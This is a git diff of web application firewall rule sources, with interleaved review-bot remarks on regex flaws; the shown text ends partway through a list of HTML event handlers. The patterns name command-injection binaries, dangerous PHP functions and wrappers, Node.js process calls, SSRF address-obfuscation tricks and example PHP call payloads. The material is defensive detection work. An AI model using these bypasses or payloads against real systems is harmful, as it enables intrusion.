+USER .+?
+PASS .+?
+RETR \d+?
+DELE \d+?
+UIDL(?: \d+)?
+APOP [\w]+ [a-f0-9]{32}
+TOP \d+(?: \d+)?
+AUTH [A-Z0-9-_]{1,20} (?:=|(?:[\w+/]{4})*(?:[\w+/]{2}==|[\w+/]{3}=))
diff --git a/regex-assembly/932321.ra b/regex-assembly/932321.ra
new file mode 100644
index 0000000000..8389557b9a
--- /dev/null
+++ b/regex-assembly/932321.ra
@@ -0,0 +1,13 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##!^ (?si)\r\n.*?\b
+
+##! POP3 Commands - PL3
+
+##! POP3 Commands - No args
+QUIT
+STAT
+NOOP
+RSET
+CAPA
diff --git a/regex-assembly/932370.ra b/regex-assembly/932370.ra
new file mode 100644
index 0000000000..1a0289a119
--- /dev/null
+++ b/regex-assembly/932370.ra
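Review bot: `AUTH [A-Z0-9-_]{1,20} (?:=|(?:[\w+/]{4})*(?:[\w+/]{2}==|[\w+/]{3}=))` is the SMTP expression from 932300 reused for POP3 and shares its gap: an initial response whose decoded length is a multiple of three carries no `=` padding and is not matched, e.g. a 16-character PLAIN blob for a 12-byte `\0user\0passwd`. `(?:[\w+/]{4})+(?:[\w+/]{2}==|[\w+/]{3}=)?` accepts the unpadded form too, and since the two files must stay in step a comment pointing at 932300 would help. Separately, `USER .+?` and `PASS .+?` end the alternative on a lazy quantifier with nothing after it, so under `(?s)` they only ever consume a single character and are equivalent to `USER .`; writing what is meant (`USER .` for "any argument", or `USER .+` if a later anchor is intended) avoids a misleading pattern.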
@@ -0,0 +1,206 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932370 (RCE Windows command injection part 1/2) +##! +##! The list comes from the project LOLBAS. You can get it using the following one-liner: +##! `curl -s -H "Accept: application/vnd.github.v3+json" https://api.github.com/repos/LOLBAS-Project/LOLBAS/git/trees/master\?recursive\=1 | jq -r '.tree[].path ' | grep ^yml/ | cut -f3 -d/ | cut -f1 -d. | tr 'A-Z' 'a-z' | sort | uniq` +##! To prevent some FP for a command, you can require command parameters +##! after a command. Only do this if the command regularly causes FP and if +##! allowing the bare command (without parameters) is not too dangerous. +##! (Note: due to \b following the regexp, a word boundary is also required +##! further on, so some letter/number is needed for a match). Example: +##! +##! diff@ + +##!+ i + +##! extension/switches suffix +##! cmd.com, cmd.exe, etc. +##!$ (?:\.[\"\^]*\w+)? +##! cmd/h +##!$ \b + +##! 
starting tokens prefix +##!> assemble + ##!> include windows-commands-prefix + + ##!> cmdline windows + + acccheckconsole + adplus + advpack + agentexecutor + appinstaller + appvlp + aspnet_compiler + at@ + atbroker + bash + bginfo + bitsadmin + cdb + certoc + certreq + certutil + cl_invocation + cl_loadassembly + cl_mutexverifiers + cmd + cmdkey + cmdl32 + cmstp + comsvcs + configsecuritypolicy + conhost + control + coregen + createdump + csc + cscript + csi + customshellhost + datasvcutil + defaultpack + desk + desktopimgdownldr + devicecredentialdeployment + devtoolslauncher + dfshim + dfsvc + diantz + diskshadow + dnscmd + dnx + dotnet + dump64 + dxcap + esentutl + eventvwr + excel + expand + explorer + extexport + extrac32 + findstr + finger + fltmc + forfiles + fsi + fsianycpu + fsutil + ftp + gfxdownloadwrapper + gpscript + hh + ie4uinit + ieadvpack + ieexec + ieframe + ilasm + imewdbld + infdefaultinstall + installutil + jsc + launch-vsdevshell + ldifde + makecab + manage-bde + mavinject + mftrace + microsoft + mmc + mpcmdrun + msbuild + msconfig + msdeploy + msdt + mshta + mshtml + msiexec + msohtmed + mspub + msxsl + netsh + ntdsutil + odbcconf + offlinescannershell + onedrivestandaloneupdater + openconsole + pcalua + pcwrun + pcwutl + pester + pktmon + pnputil + powerpnt + presentationhost + print + printbrm + procdump + protocolhandler + psr + pubprn + rasautou + rcsi + rdrleakdiag + reg + regasm + regedit + regini + register-cimprovider + regsvcs + regsvr32 + remote + replace + rpcping + rundll32 + runexehelper + runonce + runscripthelper + sc@ + schtasks + scriptrunner + setres + settingsynchost + setupapi + shdocvw + shell32 + sqldumper + sqlps + sqltoolsps + squirrel + ssh + stordiag + syncappvpublishingserver + syssetup + te@ + tracker + ttdinject + tttracer + unregmp2 + update + url + utilityfunctions + vbc + verclsid + visualuiaverifynative + vsiisexelauncher + vsjitdebugger + wab + wfc + winget + winrm + winword + wlrmdr + wmic + workfolders + 
wscript + wsl + wsreset + wt@ + wuauclt + xwizard + zipfldr + ##!< +##!< diff --git a/regex-assembly/932380.ra b/regex-assembly/932380.ra new file mode 100644 index 0000000000..3242abdfd7 --- /dev/null +++ b/regex-assembly/932380.ra @@ -0,0 +1,23 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932380 (RCE Windows command injection part 2/2) +##! +##!+ i + +##! extension/switches suffix +##! cmd.com, cmd.exe, etc. +##!$ (?:\.[\"\^]*\w+)? +##! cmd/h +##!$ \b + +##! starting tokens prefix +##!> assemble + ##!> include windows-commands-prefix + + ##!> cmdline windows + + ##!> include-except windows-commands windows-commands-fps + + ##!< +##!< diff --git a/util/regexp-assemble/regexp-933131.data b/regex-assembly/933131.ra similarity index 69% rename from util/regexp-assemble/regexp-933131.data rename to regex-assembly/933131.ra index a4df468f40..717b5d372b 100644 --- a/util/regexp-assemble/regexp-933131.data +++ b/regex-assembly/933131.ra @@ -1,3 +1,6 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + AUTH_TYPE HTTP_ACCEPT HTTP_ACCEPT_CHARSET diff --git a/regex-assembly/933160.ra b/regex-assembly/933160.ra new file mode 100644 index 0000000000..ce664710de --- /dev/null +++ b/regex-assembly/933160.ra 
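Review bot: The LOLBAS refresh one-liner in the 932370 header strips extensions with `cut -f1 -d.`, which also truncates dotted binary names, and the bare `microsoft` entry in the list looks like the stub of exactly such a name (LOLBAS ships `Microsoft.Workflow.Compiler`, presumably the origin here). As listed, `microsoft` matches any `microsoft` token in the injection context — `microsoft.com` through the `(?:\.[\"\^]*\w+)?` suffix — while the real binary name is only matched incidentally by that same optional suffix. Generating with `sed 's/\.[^.]*$//'` in place of `cut -f1 -d.` strips only the final extension; then either list the full dotted name or keep `microsoft` with a comment explaining the truncation so the next regeneration does not silently change the rule.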
@@ -0,0 +1,54 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##! optional opening parenthesis before command +##!^ \b\(? +##! optional quotes +##!^ ['\"]* + +##! match comments: `/*...*/`, `//...`, `#...` +##!$ (?:/\*.*\*/|//.*|#.* +##! match white space and quotes +##!$ |\s|\")* + +##! optional quotes +##!$ ['\"]* +##! optional closing parenthesis after command +##!$ \)?\s* + +##! mandatory parentheses containing optional parameters +##!$ \(.*\) + +assert +assert_options +chr +create_function +eval +exec +file +filegroup +glob +imagegif +imagejpeg +imagepng +imagewbmp +imagexbm +is_a +md5 +opendir +passthru +popen +readfile +tmpfile +unpack + +##! English words, or potential snippets of them, are added here to perform a regex match. +##! Compared to the parallel match performed by 933150, fewer false positives will be generated. +exp +ord +prev +stat +substr +system +unlink diff --git a/regex-assembly/933161.ra b/regex-assembly/933161.ra new file mode 100644 index 0000000000..e6e25f75ef --- /dev/null +++ b/regex-assembly/933161.ra 
@@ -0,0 +1,104 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! File autogenerated by util/php-dictionary-gen with: -a 30 -F 90000 -s ../fp-finder/spell.sh + +##!+ i +##!^ \b +##!$ (?:\s|/\*.*\*/|#.*|//.*)*\(.*\) + +abs +asin +assert +assert_options +basename +checkdate +chr +chroot +compact +constant +copy +cos +cosh +count +create_function +crypt +current +date +decoct +define +defined +dir +end +eval +exec +exp +explode +extract +file +fileatime +filectime +filegroup +fileinode +filemtime +fileowner +fileperms +filesize +filetype +flock +floor +flush +glob +hash +header +idate +imagegif +imagejpeg +imagepng +imagewbmp +imagexbm +implode +is_a +key +link +log +mail +max +md5 +min +name +next +opendir +ord +pack +pass +passthru +pi +popen +pow +prev +rand +range +readfile +rename +reset +round +serialize +shuffle +sin +sleep +sort +stat +substr +symlink +syslog +system +tan +time +tmpfile +touch +trim +ucfirst +unlink +unpack +virtual diff --git a/regex-assembly/933200.ra b/regex-assembly/933200.ra new file mode 100644 index 0000000000..a37d8b31b2 --- /dev/null +++ b/regex-assembly/933200.ra 
@@ -0,0 +1,32 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! PHP Wrappers +##! +##! PHP comes with many built-in wrappers for various URL-style protocols for +##! use with the filesystem functions such as fopen(), copy(), file_exists() and +##! filesize(). Abusing of PHP wrappers like phar:// could lead to RCE as +##! describled by Sam Thomas at BlackHat USA 2018 (https://bit.ly/2yaKV5X), even +##! wrappers like zlib://, glob://, rar://, zip://, etc... could lead to LFI and +##! expect:// to RCE. +##! +##! Valid PHP wrappers can be found in the PHP documentation here: +##! https://www.php.net/manual/en/wrappers.php + +##! Suffix marker: all options end with :// +##!$ :// + +bzip2 +expect +glob +ogg +phar +rar +ssh2 +ssh2.shell +ssh2.exec +ssh2.tunnel +ssh2.sftp +ssh2.scp +zip +zlib diff --git a/regex-assembly/933210.ra b/regex-assembly/933210.ra new file mode 100644 index 0000000000..6162369e14 --- /dev/null +++ b/regex-assembly/933210.ra 
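Review bot: In this rendering the continuation lines of the wrapper description — `use with the filesystem functions such as fopen(), copy(), file_exists() and`, `filesize(). Abusing of PHP wrappers like phar:// could lead to RCE as`, `describled by Sam Thomas ...`, `wrappers like zlib://, glob://, ...` and `expect:// to RCE.` — appear without the `##!` marker that the surrounding comment lines carry. If that is the file's real content rather than a display artifact, the assembler will treat each of those lines as a regex alternative and emit them into the 933200 pattern, so each should start with `##! `; this is easy to confirm by inspecting the assembled regex for the string `Sam Thomas`. Either way, `describled` is a typo for `described`.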
@@ -0,0 +1,31 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Helpers +##!> define single_or_double_quotes ['"] +##!> define string_in_round_brackets \(.+\) + +##!$ ; + +##!> assemble + ##! example payload: (system)(ls); + {{string_in_round_brackets}}{{string_in_round_brackets}} + + ##! example payload: (sys)"tem"(ls); + {{string_in_round_brackets}}{{single_or_double_quotes}}[a-zA-Z-_0-9]+{{single_or_double_quotes}}{{string_in_round_brackets}} + + ##! example payload: a=system&b=$_GET[0](ls); + \[\d+\]{{string_in_round_brackets}} + + ##! example payload: {0}("ls") + \{\d+\}{{string_in_round_brackets}} + + ##! example payload: $a("ls") + \$[^(\),.;\x5c/]+{{string_in_round_brackets}} + + ##! example payload: "system"("ls") + {{single_or_double_quotes}}[a-zA-Z0-9-_\x5c]+{{single_or_double_quotes}}{{string_in_round_brackets}} + + ##! example payload: (string)system("ls") + \([^\)]*string[^\)]*\)[a-zA-Z-_0-9\"'.{}\[\]\s]+\([^\)]*\) +##!< diff --git a/regex-assembly/933211.ra b/regex-assembly/933211.ra new file mode 100644 index 0000000000..77a935a243 --- /dev/null +++ b/regex-assembly/933211.ra 
@@ -0,0 +1,30 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Helpers +##!> define single_or_double_quotes ['"] +##!> define string_in_round_brackets \(.+\) +##!$ (?:;|$)? + +##!> assemble + ##! example payload: (system)(ls) + {{string_in_round_brackets}}{{string_in_round_brackets}} + + ##! example payload: (sys)"tem"(ls) + {{string_in_round_brackets}}{{single_or_double_quotes}}[a-zA-Z-_0-9]+{{single_or_double_quotes}}{{string_in_round_brackets}} + + ##! example payload: $_GET[0]("ls") + \[\d+\]{{string_in_round_brackets}} + + ##! example payload: {0}("ls") + \{\d+\}{{string_in_round_brackets}} + + ##! example payload: $a("ls") + \$[^(\),.;\x5c/]+{{string_in_round_brackets}} + + ##! example payload: "system"("ls") + {{single_or_double_quotes}}[a-zA-Z0-9-_\x5c]+{{single_or_double_quotes}}{{string_in_round_brackets}} + + ##! example payload: (string)system("ls") + \([^\)]*string[^\)]*\)[a-zA-Z-_0-9\"'.{}\[\]\s]+\([^\)]*\) +##!< diff --git a/regex-assembly/934100.ra b/regex-assembly/934100.ra new file mode 100644 index 0000000000..00d76a5ccf --- /dev/null +++ b/regex-assembly/934100.ra 
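Review bot: The suffix `##!$ (?:;|$)?` in 933211 is vacuous: the trailing `?` makes the group optional, so it matches the empty string at every position and constrains nothing — the rule is therefore exactly 933210 without the `;` requirement. If that is the intent (a looser sibling at a higher PL), drop the suffix line and say so, e.g. `##! Same alternatives as 933210 without the trailing ';' requirement`; if the intent was "followed by `;` or end of input", remove the `?` so it reads `##!$ (?:;|$)`. The two `define` lines and all seven alternatives are also verbatim copies of 933210, so an `##!> include` of a shared fragment would keep the two from drifting apart.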
@@ -0,0 +1,230 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Note that the rule uses `multiMatch` and `removeWhitespace. +##! The explicit white space matches will be matched before +##! `removeWhitespace` is applied, everything else will be matched +##! after white space removal. + +##!> define js-prop-start \[['\"`] +##!> define js-prop-start-dynamic \[ +##!> define js-prop-finish ['\"`]\] + + +##! node-serialize serialized function flag +_\$\$ND_FUNC\$\$_ +__js_function +\beval\( +String\.fromCharCode +function\(\){ +new\s+Function\s*\( +this\.constructor +module\.exports= +\(\s*\Wchild_process\W\s*\) + + +##!> assemble + \( + \.call\( + ##!=< js-call +##!< + +##! All "process" method names +##! Note that `sync` will be appended optionally to all, as many +##! of the names have a twin with the `sync` suffix. +##!> assemble + access + appendfile + argv + availability + caveats + chmod + chown + close + copyfile + cp + createreadstream + createwritestream + exec + execfile + exists + fchmod + fchown + fdata + ##! yes, fdatasyncsync + fdatasync + fstat + ##! yes, fsyncsync + fsync + futimes + inodes + lchmod + link + lstat + lutimes + mkdir + mkdtemp + open + opendir + read + readdir + readfile + readlink + readv + rename + rm + spawn + spawnfile + stat + symlink + truncate + unlink + unwatchfile + utimes + watchfile + writefile + write + writev + ##!=> + (?:sync)? + ##!=< process-funcs +##!< + +##! All "process" prop names +##!> assemble + binding + constructor + env + global + main + mainModule + process + require + ##!=< process-props +##!< + +##! All "console" method names +##!> assemble + debug + error + info + trace + warn + ##!=< console-funcs +##!< + +##! All "require" method names +##!> assemble + resolve + ##!=< require-funcs +##!< + +##! All "require" property names +##!> assemble + main + extensions + cache + ##!=< require-props +##!< + + +##! 
"process" payloads +##!> assemble + process + ##!=> + + ##! Match method calls via their usual syntax: foo.bar() + ##!> assemble + \. + ##!=> + ##!=> process-funcs + ##!=> js-call + ##!< + + ##! Match properties via their usual syntax: foo.bar + ##!> assemble + \. + ##!=> + ##!=> process-props + ##!< + + ##! Match properties functions via: foo["bar"] + ##!> assemble + {{js-prop-start}} + ##!=> + ##!> assemble + ##!=> process-funcs + ##!< + ##!> assemble + ##!=> process-props + ##!< + ##!=> + {{js-prop-finish}} + ##!< +##!< + +##! Match dynamic property access: process[req.query.a] +##! Note that we don't require `process` as a prefix here +##!> assemble + ##!=> process-props + {{js-prop-start-dynamic}} +##!< + + +##! "console" payloads +##!> assemble + console + ##!=> + + ##! Match method calls via their usual syntax: foo.bar() + ##!> assemble + \. + ##!=> + ##!=> console-funcs + ##!=> js-call + ##!< + + ##! Match properties and functions via: foo["bar"] + ##!> assemble + {{js-prop-start}} + ##!=> + ##!=> console-funcs + ##!=> + {{js-prop-finish}} + ##!< +##!< + +##! "require" payloads +##!> assemble + require + ##!=> + + ##! Match method calls via their usual syntax: foo.bar() + ##!> assemble + \. + ##!=> + ##!=> require-funcs + ##!=> js-call + ##!< + + ##! Match properties via their usual syntax: foo.bar + ##!> assemble + \. + ##!=> + ##!=> require-props + ##!< + + ##! Match properties and functions via: foo["bar"] + ##!> assemble + {{js-prop-start}} + ##!=> + ##!> assemble + ##!=> require-funcs + ##!< + ##!> assemble + ##!=> require-props + ##!< + ##!=> + {{js-prop-finish}} + ##!< +##!< diff --git a/regex-assembly/934101.ra b/regex-assembly/934101.ra new file mode 100644 index 0000000000..a2ac07236b --- /dev/null +++ b/regex-assembly/934101.ra @@ -0,0 +1,14 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!$ \s*\( + +close +exists +fork +open +read +spawn +watch +write +require 
diff --git a/regex-assembly/934120.ra b/regex-assembly/934120.ra
new file mode 100644
index 0000000000..09ff067908
--- /dev/null
+++ b/regex-assembly/934120.ra
@@ -0,0 +1,187 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Bypasses and techniques here come from: +##! - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery +##! - https://github.com/cujanovic/SSRF-Testing + +##!+ i + +##! add capture group +##!^ ( +##!$ ) + +##! This regex starts with a list of all the schemes that can be used to make a request +##!> assemble + ##!> include url-schemes + ##!=> + :// + ##!=> + + ##! http://425.510.425.510/ Dotted decimal with overflow (already covered by RFI rule 931100) + ##! http://2852039166/ Dotless decimal + ##! http://7147006462/ Dotless decimal with overflow + \d{10} + + ##! http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal + (?:0x[a-f0-9]{2}\.){3}0x[a-f0-9]{2} + + ##! http://0xA9FEA9FE/ Dotless hexadecimal + 0x[a-f0-9]{8} + + ##! http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow + 0x[a-f0-9]{16} + + ##! http://0251.0376.0251.0376/ Dotted octal + ##! http://0251.00376.000251.0000376/ Dotted octal with padding + (?:0{1,4}\d{1,3}\.){3}0{1,4}\d{1,3} + + ##! http://169.254.43518/ + \d{1,3}\.\d{1,3}\.\d{5} + + ##! http://169.16689662/ + \d{1,3}\.\d{8} + + ##! glibc Name Service Switch abuse + ##! http://\\l\\o\\c\\a\\l\\h\\o\\s\\t (while underscore is not valid RFC syntax, it is allowed and might be used) + (?:\x5c\x5c[a-z\d-]\.?_?)+ + + ##! http://[::ffff:a9fe:a9fe] IPV6 Compressed - IPv6 (base regex from https://ihateregex.io/expr/ipv6/, with [0-9] converted to \d and with non-capturing groups (below)) + ##! http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded + ##! http://[fe80::%zone1] link-local unicast with zone ID + ##! http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4 + ##! http://[::] the unspecified address + + ##! Something that looks like IPv6 in a URL. + ##! Matches full and compressed IPv6, link-local IPv6 with + ##! zone ID, and embedded IPv4. + ##! 
We could match the IPv6 specification here but that would + ##! decrease performance of the regular expression and would + ##! actually increase the possibility for bypasses. + \[[a-f\d:]+(?:[\d.]+|%\w+)?\] + + + ##! These come from https://github.com/cujanovic/SSRF-Testing + ##! These bypasses work by confusing URL parsers in different languages (e.g., PHP, Python, Ruby, Perl) + ##! and libraries (e.g. cURL). The bypasses are parser specific but will often be combined to break + ##! multiple parsers with one try. The goal is often to get the application to call another library + ##! with the malicious URL, e.g. libcurl or glibc (name resolution via gethostbyname(), see also + ##! Name Service Switch abuse above). + + ##! http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ (already covered by RFI rule 931100) + + ##! http://127.88.23.245:22/?@google.com:80/ (already covered by RFI rule 931100) + + ##! http://127.88.23.245:22/#@www.google.com:80/ (already covered by RFI rule 931100) + + ##! http://google.com:80\\@127.88.23.245:22/ (already covered by RFI rule 931100) + + ##! http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ + ##! http://google.com:80+&@google.com:80#+@127.88.23.245:22/ + + ##! create ip-or-domain for later use + ##!> assemble + (?:\d{1,3}\.){3,3}\d{1,3} + [a-z][\w\-\.]{1,255} + ##!=> + :\d{1,5} + ##!=< ip-or-domain + ##!< + + ##!> assemble + ##! domain + port + [a-z][\w\-\.]{1,255}:\d{1,5} + ##!=> + + ##! at least one of the evasion techniques + ##!> assemble + ##! technique 1 + ##!> assemble + ##! possible white spaces to fool safety checks in URL parsers + \s* + ##!=> + + ##! &@ to confuse URL parsers (& can indicate query parameter, @ indicates user info) + &?@ + ##!=> + + ##! IPv4 + port or domain + port + ##!=> ip-or-domain + + ##! optional forward slash + \/? + ##!=> + ##!< + + ##! technique 2 + ##!> assemble + ##! fragment to confuse URL parsers + # + ##!=> + + ##! 
possible white spaces to fool safety checks in URL parsers + \s* + ##!=> + + ##! &@ to confuse URL parsers (& can indicate query parameter, @ indicates user info) + &?@ + ##!=> + + ##! IPv4 + port or domain + port + ##!=> ip-or-domain + + ##! optional forward slash + /? + ##!=> + ##!< + ##!< + ##!=> + + + ##!=> + ##!< + + ##! Enclosed alphanumerics are used for evasion (https://en.wikipedia.org/wiki/Enclosed_Alphanumerics). + ##! See also https://github.com/cujanovic/SSRF-Testing. + ##! These will normally sound many alarms, but having them flagged as ssrf attempt makes sense + + ##!> assemble + ##! ⓪,①,②,③,④,⑤,⑥,⑦,⑧,⑨,⑩,⑪,⑫,⑬,⑭,⑮,⑯,⑰,⑱,⑲,⑳ + \xe2\x91[\xaa\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3] + ##! ⑴,⑵,⑶,⑷,⑸,⑹,⑺,⑻,⑼,⑽,⑾,⑿ + \xe2\x91[\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf] + ##! ⒀,⒁,⒂,⒃,⒄,⒅,⒆,⒇ + \xe2\x92[\x80\x81\x82\x83\x84\x85\x86\x87] + ##! ⒈,⒉,⒊,⒋,⒌,⒍,⒎,⒏,⒐,⒑,⒒,⒓,⒔,⒕,⒖,⒗,⒘,⒙,⒚,⒛ + \xe2\x92[\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b] + ##! ⒜,⒝,⒞,⒟,⒠,⒡,⒢,⒣,⒤,⒥,⒦,⒧,⒨,⒩,⒪,⒫,⒬,⒭,⒮,⒯,⒰,⒱,⒲,⒳,⒴,⒵ + \xe2\x92[\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5] + ##! Ⓐ,Ⓑ,Ⓒ,Ⓓ,Ⓔ,Ⓕ,Ⓖ,Ⓗ,Ⓘ,Ⓙ + \xe2\x92[\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf] + ##! Ⓚ,Ⓛ,Ⓜ,Ⓝ,Ⓞ,Ⓟ,Ⓠ,Ⓡ,Ⓢ,Ⓣ,Ⓤ,Ⓥ,Ⓦ,Ⓧ,Ⓨ,Ⓩ + \xe2\x93[\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f] + ##! ⓐ,ⓑ,ⓒ,ⓓ,ⓔ,ⓕ,ⓖ,ⓗ,ⓘ,ⓙ,ⓚ,ⓛ + \xe2\x93[\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b] + ##! ⓜ,ⓝ,ⓞ,ⓟ,ⓠ,ⓡ,ⓢ,ⓣ,ⓤ,ⓥ,ⓦ,ⓧ,ⓨ,ⓩ + \xe2\x93[\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9] + ##! ⓫,⓬,⓭,⓮,⓯,⓰,⓱,⓲,⓳,⓴ + \xe2\x93[\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4] + ##! ⓿,⓵,⓶,⓷,⓸,⓹,⓺,⓻,⓼,⓽,⓾ + \xe2\x93[\xbf\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe] + ##! ideographic full stop: 。 + \xe3\x80\x82 + ##!=< enclosed-alnums + ##!< + + ##! an IP could start with digits and dots + ##!> assemble + [\d.]{0,11} + ##!=> + ##!> assemble + ##!=> enclosed-alnums + ##!< + ##!=> + ##! 
match all for capture + + + ##!=> + ##!< +##!< diff --git a/regex-assembly/934140.ra b/regex-assembly/934140.ra new file mode 100644 index 0000000000..ec33ac5624 --- /dev/null +++ b/regex-assembly/934140.ra @@ -0,0 +1,4 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +\@\{.*\} diff --git a/regex-assembly/934150.ra b/regex-assembly/934150.ra new file mode 100644 index 0000000000..22786be6e3 --- /dev/null +++ b/regex-assembly/934150.ra @@ -0,0 +1,4 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +Process\s*\.\s*spawn\s*\( diff --git a/regex-assembly/934160.ra b/regex-assembly/934160.ra new file mode 100644 index 0000000000..f62d06d9c0 --- /dev/null +++ b/regex-assembly/934160.ra @@ -0,0 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Match while(true) like loops +##!> assemble +##!^ while\s*\([\s(]* +##!$ .*\) + ##!> include js-truthy-values +##!< diff --git a/regex-assembly/934170.ra b/regex-assembly/934170.ra new file mode 100644 index 0000000000..8ea60176c4 --- /dev/null +++ b/regex-assembly/934170.ra @@ -0,0 +1,10 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!^ ^ + +##!> assemble + data: + ##!=> + ##!> include charset-specification-no-anchors +##!< diff --git a/regex-assembly/941130.ra b/regex-assembly/941130.ra new file mode 100644 index 0000000000..422c34e66c --- /dev/null +++ b/regex-assembly/941130.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i +##!^ . +##!$ \b + +\bxlink:href +\bxhtml +\bxmlns +!ENTITY\s+(?:\S+|%\s+\S+)\s+SYSTEM +!ENTITY\s+(?:\S+|%\s+\S+)\s+PUBLIC +\bdata:text/html +\bformaction +@import +;base64 +\bpattern\b.*?= 
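Review bot: In 934120.ra the alternative `0x[a-f0-9]{16}` (dotless hexadecimal with overflow) can never decide a match on its own, because the unanchored `0x[a-f0-9]{8}` alternative already matches the first eight hex digits of the same input; only the length of the capture differs. If the longer capture is wanted for logging, `0x[a-f0-9]{8}(?:[a-f0-9]{8})?` says so explicitly; otherwise the line can go. Two smaller points in the same file: `(?:\d{1,3}\.){3,3}\d{1,3}` is just `{3}`, and the comment `##! match all for capture` near the end is followed only by blank lines before `##!=>`, so either the pattern it announces is missing or the comment is stale (the blank lines may be a rendering artefact here — worth checking against the file itself).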
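Review bot: 934150.ra has no explanatory comment besides the boilerplate header, and unlike its siblings it omits `##!+ i`, so a reader cannot tell whether the case-sensitive `Process\s*\.\s*spawn\s*\(` is targeting Ruby's `Process.spawn` (which it looks like) or whether the flag was forgotten. One line such as `##! Ruby: Process.spawn( ... ) — case-sensitive on purpose, Ruby constants are capitalised` would settle it and stop a later "harmonisation" pass from adding the flag.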
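Review bot: The `##!^ .` prefix in 941130.ra requires one arbitrary character before every alternative, so a value that begins with `xmlns`, `@import` or `;base64` at offset 0 is not matched, and because `.` does not match a newline without the `s` flag the same holds directly after a line break. If skipping offset 0 is intentional the file should say why; if the character is only there to give the rule something to capture, `##!^ [\s\S]` keeps that behaviour across newlines. Either way a comment on the prefix line is missing.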
diff --git a/regex-assembly/941160.ra b/regex-assembly/941160.ra
new file mode 100644
index 0000000000..7d58620262
--- /dev/null
+++ b/regex-assembly/941160.ra
@@ -0,0 +1,371 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> assemble + <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*? + ##!=< js-prop-prefix +##!< + +##!> assemble + s\W*?c\W*?r\W*?i\W*?p\W*?t + f\W*?o\W*?r\W*?m + d\W*?i\W*?a\W*?l\W*?o\W*?g + s\W*?t\W*?y\W*?l\W*?e + s\W*?v\W*?g + m\W*?a\W*?r\W*?q\W*?u\W*?e\W*?e + l\W*?i\W*?n\W*?k[^>\w] + o\W*?b\W*?j\W*?e\W*?c\W*?t[^>\w] + e\W*?m\W*?b\W*?e\W*?d[^>\w] + a\W*?p\W*?p\W*?l\W*?e\W*?t[^>\w] + p\W*?a\W*?r\W*?a\W*?m[^>\w] + i?\W*?f\W*?r\W*?a\W*?m\W*?e[^>\w] + b\W*?a\W*?s\W*?e[^>\w] + b\W*?o\W*?d\W*?y[^>\w] + m\W*?e\W*?t\W*?a[^>\w] + i\W*?m\W*?a?\W*?g\W*?e?[^>\w] + v\W*?i\W*?d\W*?e\W*?o[^>\w] + a\W*?u\W*?d\W*?i\W*?o[^>\w] + b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s[^>\w] + s\W*?e\W*?t[^>\w] + a\W*?n\W*?i\W*?m\W*?a\W*?t\W*?e[^>\w] + ##!=< js-payloads +##!< + + +##!> assemble + (?:<\w.*[\s/]|['\"](?:.*[\s/])?) + ##!=< html-properties-prefix +##!< + +##!> assemble + background + formaction + lowsrc + onabort + onactivate + onadapteradded + onaddtrack + onafterprint + onafterscriptexecute + onafterupdate + onalerting + onanimationcancel + onanimationend + onanimationiteration + onanimationstart + onantennastatechange + onappcommand + onaudioend + onaudioprocess + onaudiostart + onauxclick + onbeforeactivate + onbeforecopy + onbeforecut + onbeforedeactivate + onbeforeeditfocus + onbeforeinput + onbeforepaste + onbeforeprint + onbeforescriptexecute + onbeforetoggle + onbeforeunload + onbeforeupdate + onbegin + onbeginEvent + onblocked + onblur + onbounce + onboundary + onbroadcast + onbusy + oncached + oncallschanged + oncanplay + oncanplaythrough + oncardstatechange + oncellchange + oncfstatechange + onchange + onchargingchange + onchargingtimechange + onchecking + 